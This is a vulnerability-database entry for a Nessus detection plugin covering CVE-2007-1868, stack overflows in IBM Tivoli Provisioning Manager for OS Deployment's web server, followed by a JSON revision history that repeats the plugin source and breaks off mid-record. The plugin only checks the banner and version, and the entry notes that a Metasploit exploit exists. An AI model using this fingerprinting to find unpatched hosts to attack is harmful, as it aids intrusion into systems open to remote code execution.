IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows
2007-05-03T00:00:00
ID IBM_TPMFOSD_OVERFLOW.NASL Type nessus Reporter Tenable Modified 2018-07-12T00:00:00
Description
The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server.
A remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(25149);
script_version("1.14");
script_cve_id("CVE-2007-1868");
script_bugtraq_id(23264);
script_name(english:"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows");
script_summary(english:"Gets IBM TPM for OS Deployment Server version");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by multiple vulnerabilities." );
script_set_attribute(attribute:"description", value:
"The remote host is running IBM Tivoli Provisioning Manager for OS
Deployment. The version of this software has multiple buffer overflow
vulnerabilities in the HTTP server.
A remote attacker may exploit these flaws to crash the service or
execute code on the remote host with the privileges of the TPM server." );
script_set_attribute(attribute:"see_also", value:"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" );
script_set_attribute(attribute:"solution", value:
"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2007/05/03");
script_set_attribute(attribute:"patch_publication_date", value: "2007/04/01");
script_set_attribute(attribute:"vuln_publication_date", value: "2007/04/01");
script_cvs_date("Date: 2018/07/12 19:01:16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 8080, 443);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:8080);
banner = get_http_banner(port:port);
if ("Server: Rembo" >!< banner)
exit (0);
w = http_send_recv3(method:"GET", item:"/builtin/index.html", port:port);
if (isnull(w)) exit(1, "the web server did not answer");
res = w[2];
pat = '<p style="font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;"><b>TPMfOSd ([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+) \\(build ([0-9]+\\.[0-9]+)\\)</b>.*';
version = egrep(pattern:pat, string:res);
if (!version)
exit (0);
vers = ereg_replace(pattern:pat, string:version, replace:"\1");
vers = split (vers, sep:".", keep:FALSE);
if ( (int(vers[0]) < 5) ||
(int(vers[0]) == 5 && int(vers[1]) < 1) ||
(int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )
security_hole(port);
if ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )
{
build = ereg_replace(pattern:pat, string:version, replace:"\2");
build = split (build, sep:".", keep:FALSE);
if ( (int(build[0]) < 12) ||
(int(build[0]) == 12 && int(build[1]) < 4) )
security_hole(port);
}
{"id": "IBM_TPMFOSD_OVERFLOW.NASL", "bulletinFamily": "scanner", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "published": "2007-05-03T00:00:00", "modified": "2018-07-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "reporter": "Tenable", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "cvelist": ["CVE-2007-1868"], "type": "nessus", "lastseen": "2019-02-21T01:09:52", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a7e2cc78f5868296a9ad48df5b872b3cb2a0b8c999f1252feefe482445e5b910", "hashmap": [{"hash": "21aa82398f468d79000a4b0501c135c0", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "27b8e3211f7f9110f9452c2eb0697551", "key": "sourceData"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2017-10-29T13:42:12", "modified": "2012-10-03T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"$Revision: 1.13 $\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n script_osvdb_id(34678);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"$Date: 2012/10/03 21:39:19 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2012 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:42:12"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-01-16T20:07:17", "references": [{"idList": ["MSF:EXPLOIT/WINDOWS/HTTP/IBM_TPMFOSD_OVERFLOW"], "type": "metasploit"}, {"idList": ["PACKETSTORM:83093"], "type": "packetstorm"}, {"idList": ["EDB-ID:16810"], "type": "exploitdb"}, {"idList": ["IBM_TPMFOSD_CORRUPTION.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:VULN:7526", "SECURITYVULNS:VULN:7566", "SECURITYVULNS:DOC:16934"], "type": "securityvulns"}, {"idList": ["CVE-2007-1868"], "type": "cve"}, {"idList": ["OSVDB:34678"], "type": "osvdb"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "d5091abd6d231b2f15a6911310c7b061a74b07dca4ffdf8cc11b72a37536153c", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "bd78ab9e79208a1da8b5ab749c184394", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2019-01-16T20:07:17", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 6, "lastseen": "2019-01-16T20:07:17"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 1, "enchantments": {}, "hash": "0dc0418a568d5688c2ce2bf2ea45f12027a5e05e0dc58a33152dea9d055c3759", "hashmap": [{"hash": "21aa82398f468d79000a4b0501c135c0", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "27b8e3211f7f9110f9452c2eb0697551", "key": "sourceData"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2016-09-26T17:25:44", "modified": "2012-10-03T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.2", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"$Revision: 1.13 $\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n script_osvdb_id(34678);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"$Date: 2012/10/03 21:39:19 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2012 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:44"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software has multiple buffer overflow vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a5d707b1311256cc26f7c718e33a981ff66711c862a473ad5048dabaf36801f8", "hashmap": [{"hash": "85a6c5133fe23e3fb62cd513e84dcfe6", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8dad7d1e40f541c1d75ace060f4569f3", "key": "references"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "20da9bf6c60b37a5b8675145f0c864a4", "key": "cvelist"}, {"hash": "bcda3dd992ec63798c57203a5174837f", "key": "href"}, {"hash": "c1eb153e88b304c888f879c8769e6f5b", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "2354ec2849bd2954df8dd2f2199d58a2", "key": "pluginID"}, {"hash": "76c0ef0b59b698ecbd2c12ca69581342", "key": "published"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}, {"hash": "3614afb82498c2eae7cadd4b6504e12e", "key": "title"}, {"hash": "069b44d7d28f0d59f4f00d546b1e024d", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25149", "id": "IBM_TPMFOSD_OVERFLOW.NASL", "lastseen": "2018-07-13T10:10:56", "modified": "2018-07-12T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "25149", "published": "2007-05-03T00:00:00", "references": ["http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25149);\n script_version(\"1.14\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software has multiple buffer overflow\nvulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dvlabs.tippingpoint.com/advisory/TPTI-07-05\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment Fix Pack 2 with Interim Fix 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build ([0-9]+\\\\.[0-9]+)\\\\)</b>.*';\n\nversion = egrep(pattern:pat, string:res);\nif (!version)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:version, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n\nif ( int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) == 2 )\n{\n build = ereg_replace(pattern:pat, string:version, replace:\"\\2\");\n build = split (build, sep:\".\", keep:FALSE);\n\n if ( (int(build[0]) < 12) ||\n (int(build[0]) == 12 && int(build[1]) < 4) )\n security_hole(port);\n}\n", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Stack Overflows", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-13T10:10:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:ibm:tivoli_provisioning_manager_os_deployment"], "cvelist": ["CVE-2007-1868"], "cvss": {"score": 10.0, "vector": 